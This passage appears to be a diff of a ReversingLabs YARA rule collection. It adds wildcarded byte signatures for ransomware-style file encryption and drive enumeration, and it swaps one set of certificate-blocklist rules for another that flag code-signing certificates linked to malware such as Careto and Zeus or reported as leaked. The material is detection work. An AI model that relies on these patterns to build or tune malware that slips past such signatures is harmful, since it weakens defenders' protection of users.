+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A
+            ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ??
+            0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B
+            94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ??
+            50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0
+            85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B
+            40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2
+        }
+		$encrypt_files_p2 = {
+            0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ??
+            ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_drives_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+        }
+		$enum_drives_p2 = {
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D
+            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_directories_p* ) ) and ( all of ( $enum_drives_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "ec525737-9770-585e-922a-43f14e0a4a37"
+		id = "824c6b2f-081a-5f38-b949-d802f59e6ced"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7012-L7030"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L27-L43"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9127,21 +33792,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and ( pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures [ i ] . serial == "ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" ) and 1613520000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.google.com" and pe.signatures [ i ] . serial == "05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c09778b6-17c9-5b24-8977-1bd998083c23"
+		id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7032-L7048"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L45-L61"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9151,21 +33816,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toko Saya ApS" and pe.signatures [ i ] . serial == "7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AND LLC" and pe.signatures [ i ] . serial == "77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "004454a0-20f9-58f5-8c24-8097f7586c5b"
+		id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7050-L7068"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L63-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9175,21 +33840,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and ( pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures [ i ] . serial == "ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" ) and 1614643200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "251212a5-95ce-5d9f-aec0-e6d3dd099349"
+		id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7070-L7086"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L81-L97"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9199,21 +33864,21 @@ rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "7c:c1:db:2a:d0:a2:90:a4:bf:e7:a5:f3:36:d6:80:0c" and 1342051200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13C8351Aece71C731158980F575F4133 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61b67e68-9e15-5848-b12a-437a0ad8399e"
+		id = "b6a1eb97-f0da-571e-951c-57f49cf62057"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7088-L7104"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L99-L115"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f96723845adc8030b72c119311103d5c2cf136e79de226d31141d8b925ce8e75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9223,21 +33888,21 @@ rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Opera Software ASA" and pe.signatures [ i ] . serial == "13:c8:35:1a:ec:e7:1c:73:11:58:98:0f:57:5f:41:33" and 1371513600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4531954F6265304055F66Ce4F624F95B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a1efbce8-3cca-5e07-a652-d67007c72a18"
+		id = "da1aaa4c-ac71-5c4c-b663-3d1b57d69040"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7106-L7122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L117-L133"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58d3a2a5e3f6730f329bddb171ad6332794fa95848825b892c3b8324f503ae89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9247,21 +33912,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures [ i ] . serial == "0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IDAutomation.com" and pe.signatures [ i ] . serial == "45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Careto malware."
 		author = "ReversingLabs"
-		id = "76999ae0-966e-5c52-8e00-a3af8afd8fae"
+		id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7124-L7140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L135-L151"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9271,21 +33936,21 @@ rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Careto malware."
 		author = "ReversingLabs"
-		id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8"
+		id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7142-L7160"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L153-L169"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9295,21 +33960,21 @@ rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EKO-KHIM TOV" and ( pe.signatures [ i ] . serial == "00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures [ i ] . serial == "f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" ) and 1598989763 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Zeus malware."
 		author = "ReversingLabs"
-		id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3"
+		id = "6805abd8-217e-5179-ab5a-297e2a17e65e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7162-L7180"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L171-L187"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9319,21 +33984,21 @@ rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5 th Dimension LTD Oy" and ( pe.signatures [ i ] . serial == "00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures [ i ] . serial == "f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" ) and 1618531200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "isonet ag" and pe.signatures [ i ] . serial == "75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "25df791f-1128-51f9-90da-9977262d00c7"
+		id = "541a169e-a263-5901-9d8e-768306b8b8ba"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
